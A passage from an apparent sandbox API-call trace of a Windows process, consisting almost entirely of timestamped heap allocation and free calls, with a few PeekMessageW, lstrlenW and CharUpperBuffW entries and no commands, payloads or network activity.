Flags=0x0, Size=0x10) returned 0x29ec1d8 [0081.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b8a8 [0081.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2b0 [0081.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec5f8 [0081.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b828 [0081.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec5b0 [0081.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b828 | out: hHeap=0x2af0000) returned 1 [0081.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec550 [0081.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b928 [0081.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b928 | out: hHeap=0x2af0000) returned 1 [0081.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec5c8 [0081.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b968 [0081.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b968 | out: hHeap=0x2af0000) returned 1 [0081.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec4d8 [0081.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b928 [0081.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec610 [0081.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec5b0 | out: hHeap=0x2af0000) returned 1 [0081.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec5f8 | out: hHeap=0x2af0000) returned 1 [0081.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec550 | out: hHeap=0x2af0000) returned 1 [0081.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec5c8 | out: hHeap=0x2af0000) returned 1 [0081.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2b0 | out: hHeap=0x2af0000) returned 1 [0081.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b8a8 | out: hHeap=0x2af0000) returned 1 [0081.976] lstrlenW (lpString="32") returned 2 [0081.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec4d8 | out: hHeap=0x2af0000) returned 1 [0081.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b928 | out: hHeap=0x2af0000) returned 1 [0081.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec610 | out: hHeap=0x2af0000) returned 1 [0081.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec1d8 | out: hHeap=0x2af0000) returned 1 [0081.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec3b8 | out: hHeap=0x2af0000) returned 1 [0081.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b848 | out: hHeap=0x2af0000) returned 1 [0081.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec3b8 [0081.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2b0 [0081.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b9a8 [0081.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec340 | out: hHeap=0x2af0000) returned 1 [0081.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2e0 | out: hHeap=0x2af0000) returned 1 [0081.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0280 | out: hHeap=0x2af0000) returned 1 [0081.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2b0 | out: hHeap=0x2af0000) returned 1 [0081.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b9a8 | out: hHeap=0x2af0000) returned 1 [0081.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec3b8 | out: hHeap=0x2af0000) returned 1 [0081.977] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.977] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0280 [0081.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec1d8 [0081.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec340 [0081.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a928 [0081.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec3b8 [0081.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2b0 [0081.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8d8 [0081.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2e0 [0081.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec550 [0081.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a788 [0081.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec640 [0081.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a788 | out: hHeap=0x2af0000) returned 1 [0081.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec5b0 [0081.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a908 [0081.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a908 | out: hHeap=0x2af0000) returned 1 [0081.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec610 [0081.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a878 [0081.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a878 | out: hHeap=0x2af0000) returned 1 [0081.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec4f0 [0081.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a8e8 [0081.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec568 [0081.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec640 | out: hHeap=0x2af0000) returned 1 [0081.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec550 | out: hHeap=0x2af0000) returned 1 [0081.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec5b0 | out: hHeap=0x2af0000) returned 1 [0081.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec610 | out: hHeap=0x2af0000) returned 1 [0081.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2e0 | out: hHeap=0x2af0000) returned 1 [0081.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8d8 | out: hHeap=0x2af0000) returned 1 [0081.978] lstrlenW (lpString="30") returned 2 [0081.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec4f0 | out: hHeap=0x2af0000) returned 1 [0081.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8e8 | out: hHeap=0x2af0000) returned 1 [0081.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec568 | out: hHeap=0x2af0000) returned 1 [0081.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2b0 | out: hHeap=0x2af0000) returned 1 [0081.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec3b8 | out: hHeap=0x2af0000) returned 1 [0081.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a928 | out: hHeap=0x2af0000) returned 1 [0081.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2e0 [0081.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec3b8 [0081.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6c108 [0081.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec340 | out: hHeap=0x2af0000) returned 1 [0081.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec1d8 | out: hHeap=0x2af0000) returned 1 [0081.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0280 | out: hHeap=0x2af0000) returned 1 [0081.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec3b8 | out: hHeap=0x2af0000) returned 1 [0081.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6c108 | out: hHeap=0x2af0000) returned 1 [0081.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2e0 | out: hHeap=0x2af0000) returned 1 [0081.979] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.979] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0280 [0081.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec1d8 [0081.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2b0 [0081.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6aca8 [0081.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2e0 [0081.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec340 [0081.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6abe8 [0081.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec3b8 [0081.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec5f8 [0081.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6ac98 [0081.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec418 [0081.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6ac98 | out: hHeap=0x2af0000) returned 1 [0081.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec478 [0081.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6acd8 [0081.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6acd8 | out: hHeap=0x2af0000) returned 1 [0081.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec640 [0081.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6ab88 [0081.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6ab88 | out: hHeap=0x2af0000) returned 1 [0081.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec568 [0081.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6ac58 [0081.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec430 [0081.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec418 | out: hHeap=0x2af0000) returned 1 [0081.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec5f8 | out: hHeap=0x2af0000) returned 1 [0081.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec478 | out: hHeap=0x2af0000) returned 1 [0081.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec640 | out: hHeap=0x2af0000) returned 1 [0081.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec3b8 | out: hHeap=0x2af0000) returned 1 [0081.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6abe8 | out: hHeap=0x2af0000) returned 1 [0081.980] lstrlenW (lpString="20") returned 2 [0081.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec568 | out: hHeap=0x2af0000) returned 1 [0081.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6ac58 | out: hHeap=0x2af0000) returned 1 [0081.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec430 | out: hHeap=0x2af0000) returned 1 [0081.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec340 | out: hHeap=0x2af0000) returned 1 [0081.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2e0 | out: hHeap=0x2af0000) returned 1 [0081.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6aca8 | out: hHeap=0x2af0000) returned 1 [0081.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2e0 [0081.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec3b8 [0081.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a8d8 [0081.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2b0 | out: hHeap=0x2af0000) returned 1 [0081.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec1d8 | out: hHeap=0x2af0000) returned 1 [0081.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0280 | out: hHeap=0x2af0000) returned 1 [0081.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec3b8 | out: hHeap=0x2af0000) returned 1 [0081.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8d8 | out: hHeap=0x2af0000) returned 1 [0081.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2e0 | out: hHeap=0x2af0000) returned 1 [0081.980] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0081.980] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0280 [0081.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2b0 [0081.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0280 | out: hHeap=0x2af0000) returned 1 [0081.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec1d8 [0081.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2b0 | out: hHeap=0x2af0000) returned 1 [0081.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2b0 [0081.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec1d8 | out: hHeap=0x2af0000) returned 1 [0081.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0081.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec3a0 | out: hHeap=0x2af0000) returned 1 [0081.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec280 | out: hHeap=0x2af0000) returned 1 [0081.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e2580 | out: hHeap=0x2af0000) returned 1 [0081.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0240 | out: hHeap=0x2af0000) returned 1 [0081.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e20a8 | out: hHeap=0x2af0000) returned 1 [0081.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec1c0 | out: hHeap=0x2af0000) returned 1 [0081.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec130 | out: hHeap=0x2af0000) returned 1 [0081.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a4e740 | out: hHeap=0x2af0000) returned 1 [0081.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e2378 | out: hHeap=0x2af0000) returned 1 [0081.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec298 | out: hHeap=0x2af0000) returned 1 [0081.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec358 | out: hHeap=0x2af0000) returned 1 [0081.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e2350 | out: hHeap=0x2af0000) returned 1 [0081.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a4e700 | out: hHeap=0x2af0000) returned 1 [0081.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e2468 | out: hHeap=0x2af0000) returned 1 [0081.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec0d0 | out: hHeap=0x2af0000) returned 1 [0081.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e01b0 | out: hHeap=0x2af0000) returned 1 [0081.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2c8 | out: hHeap=0x2af0000) returned 1 [0081.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec328 | out: hHeap=0x2af0000) returned 1 [0081.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec220 | out: hHeap=0x2af0000) returned 1 [0081.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec1a8 | out: hHeap=0x2af0000) returned 1 [0081.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0220 | out: hHeap=0x2af0000) returned 1 [0081.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec250 | out: hHeap=0x2af0000) returned 1 [0081.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0360 | out: hHeap=0x2af0000) returned 1 [0081.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec208 | out: hHeap=0x2af0000) returned 1 [0081.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec298 [0081.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2b0 | out: hHeap=0x2af0000) returned 1 [0081.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec1a8 [0081.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec250 [0081.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0360 [0081.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e20a8 [0081.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec328 [0081.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e01b0 [0081.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec328 | out: hHeap=0x2af0000) returned 1 [0081.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e2468 [0081.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec1c0 [0081.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec328 [0081.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0220 [0081.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec1a8 | out: hHeap=0x2af0000) returned 1 [0081.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e2198 [0081.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0240 [0081.982] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e2198 | out: hHeap=0x2af0000) returned 1 [0081.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0240 | out: hHeap=0x2af0000) returned 1 [0081.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec1a8 [0081.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x29e0240 [0081.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec3a0 [0081.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec0d0 [0081.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0280 [0081.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a4e700 [0081.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a4e700 | out: hHeap=0x2af0000) returned 1 [0081.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec130 [0081.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0280 | out: hHeap=0x2af0000) returned 1 [0081.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29ec3b8 [0081.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e22d8 [0081.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2e0 [0081.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a4e700 [0081.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2e0 | out: hHeap=0x2af0000) returned 1 [0081.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e2170 [0081.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec280 [0081.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec1d8 [0081.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0081.983] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec340 [0081.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a4e740 [0081.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec340 | out: hHeap=0x2af0000) returned 1 [0081.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e2508 [0081.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2b0 [0081.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec340 [0081.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0280 [0081.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e2558 [0081.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec208 [0081.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a7e8 [0081.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec208 | out: hHeap=0x2af0000) returned 1 [0081.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e2580 [0081.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec208 [0081.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec220 [0081.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e2508 | out: hHeap=0x2af0000) returned 1 [0081.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a4e740 | out: hHeap=0x2af0000) returned 1 [0081.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2b0 | out: hHeap=0x2af0000) returned 1 [0081.984] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e2490 [0081.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2b0 [0081.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a938 [0081.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2c8 [0081.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8c8 [0081.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8c8 | out: hHeap=0x2af0000) returned 1 [0081.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8e8 [0081.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2e0 [0081.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec358 [0081.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a878 [0081.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec580 [0081.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a878 | out: hHeap=0x2af0000) returned 1 [0081.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec580 | out: hHeap=0x2af0000) returned 1 [0081.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec358 | out: hHeap=0x2af0000) returned 1 [0081.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2e0 | out: hHeap=0x2af0000) returned 1 [0081.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8e8 | out: hHeap=0x2af0000) returned 1 [0081.984] RtlAllocateHeap 